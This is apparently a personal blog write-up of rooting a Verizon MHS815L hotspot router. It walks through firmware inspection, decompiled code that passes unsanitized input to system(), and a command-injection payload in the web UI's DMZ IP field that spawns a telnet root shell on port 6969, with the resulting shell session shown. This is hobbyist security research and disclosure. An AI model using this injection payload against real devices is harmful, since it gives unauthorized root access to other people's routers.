Verizon MHS815L: from WebUI to root in 30 minutes

by Chloe, June 6, 2024

Credits: my very amazing friend for providing me with remote access to the router this guy on OpenWRT forum for grabbing the firmware files so I could take a closer peek

enough introductions, let's get through this

so today, after i got access to my t-mobile router my friend asked me: obviously i can't give up a challenge to root any device, so i asked them to tunnel it. upon them tunneling and giving me the url, i got into the webui. well damn, there's basically nothing here. ping tool would've been nice for command execution, y'know? my friend linked me to the openwrt post showing a URL to some internal settings page. this is starting to get interesting! i got onto the settings page. there's barely anything here... i tried shoving $(telnetd) in some text fields and applying, apparently that didn't work. then my friend sent me a "firmware.sfp" file. we're getting somewhere now! i looked inside and found a bunch of services inside init.d.

[chloe@Atlas init.d]$ ls -la total 172 drwxr-xr-x 2 chloe chloe 4096 Aug 23 2016 . drwxr-xr-x 15 chloe chloe 4096 Aug 23 2016 .. -rwxr-xr-x 1 chloe chloe 3012 Aug 23 2016 boot -rwxr-xr-x 1 chloe chloe 1056 Aug 23 2016 bp -rwxr-xr-x 1 chloe chloe 267 Aug 23 2016 cgroups -rwxr-xr-x 1 chloe chloe 385 Aug 23 2016 cron -rwxr-xr-x 1 chloe chloe 12517 Aug 23 2016 dnsmasq -rwxr-xr-x 1 chloe chloe 389 Aug 23 2016 done -rwxr-xr-x 1 chloe chloe 4061 Aug 23 2016 dropbear -rwxr-xr-x 1 chloe chloe 233 Aug 23 2016 firewall -rwxr-xr-x 1 chloe chloe 1322 Aug 23 2016 franklind -rwxr-xr-x 1 chloe chloe 309 Aug 23 2016 frankwebd -rwxr-xr-x 1 chloe chloe 4062 Aug 23 2016 hostless -rwxr-xr-x 1 chloe chloe 905 Aug 23 2016 kfatal -rwxr-xr-x 1 chloe chloe 1268 Aug 23 2016 kthp -rwxr-xr-x 1 chloe chloe 510 Aug 23 2016 ld7032 -rwxr-xr-x 1 chloe chloe 2015 Aug 23 2016 led -rwxr-xr-x 1 chloe chloe 309 Aug 23 2016 lighttpd -rwxr-xr-x 1 chloe chloe 4067 Aug 23 2016 marvell-wlan-sd8787 -rwxr-xr-x 1 chloe chloe 198 Aug 23 2016 max8903 -rwxr-xr-x 1 chloe chloe 368 Aug 23 2016 mmi -rwxr-xr-x 1 chloe chloe 549 Aug 23 2016 network -rwxr-xr-x 1 chloe chloe 195 Aug 23 2016 procd -rwxr-xr-x 1 chloe chloe 9925 Aug 23 2016 radvd -rwxr-xr-x 1 chloe chloe 454 Aug 23 2016 rcS -rwxr-xr-x 1 chloe chloe 2091 Aug 23 2016 sequansd -rwxr-xr-x 1 chloe chloe 483 Aug 23 2016 sfp2 -rwxr-xr-x 1 chloe chloe 159 Aug 23 2016 sqn_icc -rwxr-xr-x 1 chloe chloe 1809 Aug 23 2016 sqnimsd -rwxr-xr-x 1 chloe chloe 1824 Aug 23 2016 sqnomadmd -rwxr-xr-x 1 chloe chloe 126 Aug 23 2016 sysctl -rwxr-xr-x 1 chloe chloe 674 Aug 23 2016 sysntpd -rwxr-xr-x 1 chloe chloe 639 Aug 23 2016 tca7408 -rwxr-xr-x 1 chloe chloe 878 Aug 23 2016 telnet -rwxr-xr-x 1 chloe chloe 102 Aug 23 2016 umount -rwxr-xr-x 1 chloe chloe 160 Aug 23 2016 usb -rwxr-xr-x 1 chloe chloe 249 Aug 23 2016 watchdog -rwxr-xr-x 1 chloe chloe 266 Aug 23 2016 zzz
wait...
-rwxr-xr-x 1 chloe chloe 1322 Aug 23 2016 franklind -rwxr-xr-x 1 chloe chloe 309 Aug 23 2016 frankwebd
we're finally getting SOMEWHERE now. i looked inside the service file for "frankwebd" and found it was sitting inside /usr/sbin.
[chloe@Atlas sbin]$ ls -la frank* -rwxr-xr-x 1 chloe chloe 119701 Aug 23 2016 franklin-web.fcgi -rwxr-xr-x 1 chloe chloe 247312 Aug 23 2016 frankwebd
well shit! finally! the fcgi wasn't exactly what i was looking for but this'll be useful. i pulled these 2 executables into Ghidra and found nothing in "frankwebd" but as i started clicking in "franklin-web.fcgi"...
strcpy(acStack_d0,"uci set firewall.DMZ=redirect > /dev/null"); system(acStack_d0); strcpy(acStack_d0,"uci set firewall.DMZ.target=DNAT > /dev/null"); system(acStack_d0); strcpy(acStack_d0,"uci set firewall.DMZ.src=wan > /dev/null"); system(acStack_d0); strcpy(acStack_d0,"uci set firewall.DMZ.dest=wlan > /dev/null"); system(acStack_d0); strcpy(acStack_d0,"uci set firewall.DMZ.proto=\'tcp udp\' > /dev/null"); system(acStack_d0);
are you fucking serious? we're handling the unsanitized input into a command? i then remembered the router had a page on the webui to turn on DMZ. finally, something? i opened the firefox network tab, then i enabled it (setting it to some bogus local ip). i then edited the request to set the DMZ IP to "192.168.69.12$(telnetd -l /bin/sh -p6969)". hoping this would finally work, i dmed my friend asking if they could connect to port 6969 on the router. after a minute of silence, they sent: COULD THIS HAVE BEEN IT? I then sent, "DID IT WORK"? they shortly responded with this codeblock:
% telnet 192.168.15.1 6969 Trying 192.168.15.1... Connected to 192.168.15.1. Escape character is '^]'. BusyBox v1.19.4 (2016-07-07 15:29:43 CEST) built-in shell (ash) Enter 'help' for a list of built-in commands. /usr/sbin #
NO FUCKING WAY. IT'S FINALLY OVER. after this i made a couple of shitposts on Mastodon. this concludes the writeup. go check out my friend up there in the credits.